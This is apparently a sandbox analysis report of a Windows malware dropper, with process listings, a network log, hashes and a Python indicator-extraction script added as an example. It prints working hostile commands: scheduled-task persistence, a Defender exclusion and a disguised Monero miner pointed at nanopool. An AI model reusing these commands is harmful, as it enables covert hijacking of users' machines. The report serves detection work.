PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe

"C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe"

C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 95714f41791.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe

731da7284717.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe

27e380c23ad33.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe

0b0f89497d35095.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe

"C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe" -a

C:\Users\Admin\AppData\Local\Temp\7zS08971586\0035b9e6fdaf9.exe

0035b9e6fdaf9.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe

7da174d16d4.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\cb3f07883441a5d6.exe

cb3f07883441a5d6.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe

81edfb0db828.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\95714f41791.exe

95714f41791.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe

53d58f3832.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0035b9e6fdaf9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 81edfb0db828.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cb3f07883441a5d6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 731da7284717.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0b0f89497d35095.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 27e380c23ad33.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 7da174d16d4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53d58f3832.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 428

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704621802 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 960

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS6FA4.tmp\Install.cmd" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2852 CREDAT:275457 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.186.192:443 ipinfo.io tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.5.15:443 db-ip.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.18.146.235:80 www.maxmind.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.38.233:80 crl.usertrust.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 aucmoney.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 thegymmum.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 atvcampingtrips.com udp
US 8.8.8.8:53 kuapakualaman.com udp
US 8.8.8.8:53 renatazarazua.com udp
US 8.8.8.8:53 nasufmutlu.com udp
US 172.67.132.113:443 iplogger.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.11.8:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 172.67.132.113:443 iplogger.org tcp
US 172.67.132.113:443 iplogger.org tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
NL 212.193.30.115:80 tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 sanctam.net udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
N/A 127.0.0.1:49252 tcp
N/A 127.0.0.1:49254 tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
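The table above is a flat connection log: UDP rows to 8.8.8.8:53 carry the name that was queried, TCP rows carry the destination and, where the sandbox could attribute it, the name that resolved to it, and TCP rows with no name are connections to hard-coded addresses that never went through DNS (37.0.8.235, 37.0.11.8, 212.193.30.115 and 45.142.213.135:30058 here). The block below is an added example, not the sandbox's code: it parses that layout, separates names that were only looked up from names actually contacted, lists raw-IP and non-web-port destinations, and ranks destinations by connection count. SAMPLE_ROWS is a subset copied from the table; ALLOWLIST, which keeps certificate-revocation and Microsoft browser endpoints out of the block list, is this example's own assumption.

```python
"""Extract IOCs from a flattened sandbox Network table.  Added example, not
sandbox code.  SAMPLE_ROWS is a subset of the table above; ALLOWLIST is this
example's assumption about which destinations are OS/browser noise."""
import ipaddress
from collections import Counter

# Rows copied from the table above (country, dest, [domain], proto).
SAMPLE_ROWS = """\
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 live.goatgame.live udp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.38.233:80 crl.usertrust.com tcp
LV 45.142.213.135:30058 tcp
NL 212.193.30.115:80 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
N/A 127.0.0.1:49252 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
"""

# Assumption: CRL/OCSP fetches and Microsoft browser endpoints are noise, not C2.
ALLOWLIST = {"crl.usertrust.com", "apps.identrust.com", "x2.c.lencr.org", "ieonline.microsoft.com"}
WEB_PORTS = {80, 443}


def parse_row(line):
    """Rows are 'country dest domain proto' or, for unattributed connections, 'country dest proto'."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        (country, dest, proto), domain = parts, ""
    else:
        raise ValueError(f"unexpected row: {line!r}")
    ip, _, port = dest.rpartition(":")
    return {"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto}


def endpoint(row):
    return f"{row['ip']}:{row['port']}"


def extract_iocs(text):
    rows = [parse_row(line) for line in text.splitlines() if line.strip()]
    # Loopback rows are the sample talking to itself and carry nothing to hunt for.
    tcp = [r for r in rows if r["proto"] == "tcp" and not ipaddress.ip_address(r["ip"]).is_loopback]
    queried = {r["domain"] for r in rows if r["proto"] == "udp" and r["port"] == 53}
    connected = {r["domain"] for r in tcp if r["domain"]}
    resolved = {}
    for r in tcp:
        if r["domain"]:
            resolved.setdefault(r["ip"], r["domain"])      # first attribution wins
    return {
        "domains": sorted((queried | connected) - ALLOWLIST),
        # Looked up but never connected to: dead, sinkholed, or a failed fallback.
        "dns_only": sorted(queried - connected - ALLOWLIST),
        "resolved": resolved,
        # Connections with no DNS attribution: hard-coded C2/download addresses.
        "direct_ip": sorted({endpoint(r) for r in tcp if not r["domain"]}),
        "non_web_ports": sorted({endpoint(r) for r in tcp if r["port"] not in WEB_PORTS}),
        "top_talkers": Counter(r["domain"] or r["ip"] for r in tcp
                               if r["domain"] not in ALLOWLIST).most_common(3),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

Run over the full table the same code surfaces live.goatgame.live as the dominant destination (well over fifty connections on 443), the four raw-IP endpoints, the two nanopool hosts on the non-web port 14433, and a tail of names (watira.xyz, s.lletlee.com, music-sec.xyz, aucmoney.com and others) that were queried but never connected to.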

Files

\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 6c58494fe6c5b1165373ba8a9e2e7599
SHA1 63ec4cf742bddb40a357c33cc4f856cd42ad272c
SHA256 6ad0b50d4c8a38ef40a256a5fa70c77c67227938edbae6a0a796f7caf5533dab
SHA512 0722c387a674bd2afc1a365d9067f34c35ab2f4f8849d8b0dce68eb9dd38d9bcc4dc9402de5e1b61ebab8ed7cbc95a05cd31e2b2b1e62aeb691645ac14a7ba43

C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 913c1f0b3bda02bb59081cabb00100cc
SHA1 e54d696837a705e5375eb01a88b96247f54a18ed
SHA256 30c4283a9d09c12f10df209499658e296ec6ecec00b53eb2856d6fcc02ac1af3
SHA512 b9c6ac42b28f73bb9569512efb9cd9ace8f3cddd45b9a53532a5bf7e589a4ef61e2d854274772f1958c2319e2c25da0ff3bd992b780e2bbc32bbc172e2cff6cb

\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 dbc2a7e79089ccaaff0db5a813ec0573
SHA1 9f59a0dad033190b48656c9e9bc75b4cf92dfaf4
SHA256 fe39d84b3055c59461d7d33cbdd8681c8275078c4af936237c50e2b4dca05905
SHA512 dc32e237a767ed68a77c7c852073b78abbdc4f956343cd3d7685c91eabb20ef9f892697c12c28c7dcceda1ae618ad4345103c2a10eff358f5c5347fcf88272f7

\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 4b834fc3618ec494cf88b8f711be7fa5
SHA1 6529a895aed6dd91a04ec21e10317485fae02add
SHA256 371d57a718c40750fe063117becc1e279b491aafff092ec3b04d00b0507d2d3b
SHA512 9135bdbdc5f123280ae22a35fc71e3fa787f6e68c7ff9241fb426bcdde0a08dc7e7e73702aac16fd2556ab86486ac9494ac9010dd60a8c23dd649e078f1f1832

C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 c24c2f6d1f678e9d9c97537a6fa9a21c
SHA1 6e271e38ed67f6a5f040f11c533d94cfe15f1de9
SHA256 0dcbe758665190f8dcbf54c3591b05fdacf5e6d9aeaee0a0d01df5ceb5554ee0
SHA512 70ebf9af85373c8a63f9a6a3f2c65dd3fe4039404d39626667ea6fe7a9bbd10c45f90c20b5a0d48956d53fb6d36ccb23d4d6cc450aa068aa048a0b9dc59fdfb1

memory/2476-33-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2476-44-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2476-43-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2476-47-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-49-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1868-129-0x0000000001350000-0x000000000143E000-memory.dmp

memory/3056-131-0x0000000000E30000-0x0000000000F72000-memory.dmp

memory/556-132-0x0000000000D40000-0x0000000000D6C000-memory.dmp

memory/2836-130-0x0000000000930000-0x0000000000938000-memory.dmp

memory/2476-51-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2476-48-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-46-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-45-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-41-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2476-40-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2476-39-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 58eb70b1e310500fcfcfb92759301f4e
SHA1 fa23fb7eb50c346d04b74fedf26ed1eefede5dfe
SHA256 ac678331b8c80616bb3bc89bdbdf7a82893d0cf367fa19982024f12791790f05
SHA512 566df34bc53f7ff2efdcbb7c905eca94d17237ed30d4357f4227b6162b94aeba6181ef86c36c80da79cc749280b37eeefc8b49cd7a933113dedb973b95da9cd7

memory/2476-37-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS08971586\libstdc++-6.dll

MD5 eb932f619d197305239f51b788d6a739
SHA1 187a2c4f64c44623e12d3305682ec751b31e143c
SHA256 75d5f2decd5de4f274acb9ce8523f725e9a1b576097486accc3f1eec35f6ea9b
SHA512 56d7ab8676449ff0a178f0fb8bdecb0a49f56e75cc050f7cd3efd19841ed175971dc3a9e9dac219377eaa0d82d577e7a1d27efaed79ad349de028a7d06a045bd

C:\Users\Admin\AppData\Local\Temp\7zS08971586\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS08971586\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS08971586\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS08971586\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS08971586\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/556-133-0x0000000000140000-0x0000000000146000-memory.dmp

memory/2836-135-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/556-148-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3008-150-0x0000000002E60000-0x0000000002F60000-memory.dmp

memory/3008-152-0x0000000003120000-0x00000000031BD000-memory.dmp

memory/556-154-0x0000000000150000-0x0000000000156000-memory.dmp

memory/556-151-0x00000000001E0000-0x0000000000200000-memory.dmp

memory/2612-149-0x0000000000240000-0x0000000000249000-memory.dmp

memory/996-156-0x0000000000940000-0x0000000000A24000-memory.dmp

memory/2612-159-0x0000000000400000-0x0000000002C72000-memory.dmp

memory/1164-146-0x000000013F070000-0x000000013F080000-memory.dmp

memory/3008-173-0x0000000000400000-0x0000000002CCE000-memory.dmp

memory/2612-175-0x0000000002E40000-0x0000000002F40000-memory.dmp

memory/556-174-0x000000001B0E0000-0x000000001B160000-memory.dmp

memory/1164-176-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/2836-177-0x000000001AF90000-0x000000001B010000-memory.dmp

memory/1384-178-0x00000000027E0000-0x00000000027F6000-memory.dmp

memory/2612-179-0x0000000000400000-0x0000000002C72000-memory.dmp

memory/868-184-0x00000000004B0000-0x0000000000594000-memory.dmp

memory/3056-217-0x0000000000640000-0x0000000000652000-memory.dmp

memory/2476-230-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-229-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2476-228-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2476-227-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2476-226-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2476-225-0x0000000000400000-0x00000000009DB000-memory.dmp

memory/2836-330-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/556-331-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3008-339-0x0000000002E60000-0x0000000002F60000-memory.dmp

memory/556-340-0x000000001B0E0000-0x000000001B160000-memory.dmp

memory/2836-385-0x000000001AF90000-0x000000001B010000-memory.dmp

memory/1164-384-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/1164-386-0x000000001C600000-0x000000001C680000-memory.dmp

memory/1164-387-0x00000000007D0000-0x00000000007DE000-memory.dmp

memory/3016-395-0x000000013FE60000-0x000000013FE70000-memory.dmp

memory/1164-399-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3016-398-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3056-408-0x00000000072F0000-0x000000000737C000-memory.dmp

memory/3056-427-0x0000000000700000-0x000000000071E000-memory.dmp

memory/556-428-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/2012-431-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2012-429-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2012-448-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS6FA4.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/2360-484-0x0000000073140000-0x00000000736EB000-memory.dmp

memory/2360-485-0x0000000002890000-0x00000000028D0000-memory.dmp

memory/2360-518-0x0000000073140000-0x00000000736EB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U9VC31Q9\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

memory/3016-551-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 270d7b576b8e29f0b05f1da28d058ff3
SHA1 0fe7c637d8319e81ab816df31915b38d5382f5a3
SHA256 8d09b57bf723f41c27305a9857244e9c770baeef98e3ce9c938c6fc3bf1be685
SHA512 e533eae0f86fe1b2f1c9720f4b270f1d9736d428c274a3ec5c73f11f03e7926b522fb1ae592ff43717dc39350615f31040f63710c369bffddeccb6e0a198064b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 34c09a4fa127483e2e6f7bba66c3e9d6
SHA1 d1add7839e9c26dd319241ace385ab1a103b072a
SHA256 c0d55c3adb58ace2bd3c88f01142561b1deb62802e6479339caa2281b72986ca
SHA512 f660cdd78ccb10dc45e66b30b3a85eb5add87cdcd610d99c059d9970ed2698df203220e87f308c4bdcbbd962f95f11a9264fe3fbfc86c7ba08b10713adfc303d

memory/3016-1001-0x000000001CA50000-0x000000001CAD0000-memory.dmp

memory/2732-1000-0x000000013FCF0000-0x000000013FCF6000-memory.dmp

memory/2732-1003-0x000000001C0A0000-0x000000001C120000-memory.dmp

memory/2732-1002-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3016-1017-0x000000001CA50000-0x000000001CAD0000-memory.dmp

memory/2732-1019-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3016-1037-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/2800-1040-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2732-1041-0x000000001C0A0000-0x000000001C120000-memory.dmp

memory/2800-1048-0x00000000003E0000-0x0000000000400000-memory.dmp

memory/2800-1063-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 369040315c1391cc9a0ac9fc54970d65
SHA1 6dccfc21c1005b604dfef999fabc4355e05239ef
